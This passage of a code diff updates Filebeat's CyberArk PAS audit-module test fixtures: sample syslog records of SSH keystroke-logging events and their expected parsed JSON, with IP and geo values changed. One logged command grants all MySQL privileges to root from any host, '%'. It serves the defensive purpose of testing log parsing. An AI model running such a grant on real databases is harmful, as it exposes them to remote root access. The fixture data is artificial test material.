su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;SSHOffset=1312B;User=testark;VIDOffset=6T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:32:04","IsoTimestamp":"2021-03-15T10:32:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;SSHOffset=1312B;User=testark;VIDOffset=6T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T10:33:47Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:33:47</Timestamp>\n    <IsoTimestamp>2021-03-15T10:33:47Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=7T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:47","IsoTimestamp":"2021-03-15T10:33:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T10:35:08Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:35:08</Timestamp>\n    <IsoTimestamp>2021-03-15T10:35:08Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=7T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:08","IsoTimestamp":"2021-03-15T10:35:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T14:11:18Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:11:18</Timestamp>\n    <IsoTimestamp>2021-03-15T14:11:18Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=8T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:18","IsoTimestamp":"2021-03-15T14:11:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=8T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
+<5>1 2021-03-15T14:45:51Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:45:51</Timestamp>\n    <IsoTimestamp>2021-03-15T14:45:51Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;SSHOffset=296291B;User=testark;VIDOffset=2081T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615819476\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:45:51","IsoTimestamp":"2021-03-15T14:45:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;SSHOffset=296291B;User=testark;VIDOffset=2081T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log-expected.json
index d7712ea0c0c4..b9c29d126a95 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log-expected.json
@@ -97,23 +97,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "d284c268-2ba0-4366-af52-e33459b073a1",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:49:49Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Keystroke logging",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:49</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:49</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=10T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 06:49:49",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "keystroke logging",
@@ -143,24 +138,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -191,23 +183,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "29f340df-89e9-405a-beae-0216390cda42",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:32:04Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Keystroke logging",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:32:04</Timestamp>\n    <IsoTimestamp>2021-03-15T10:32:04Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:32:04</Timestamp>\n    <IsoTimestamp>2021-03-15T10:32:04Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;SSHOffset=1312B;User=testark;VIDOffset=6T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 03:32:04",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
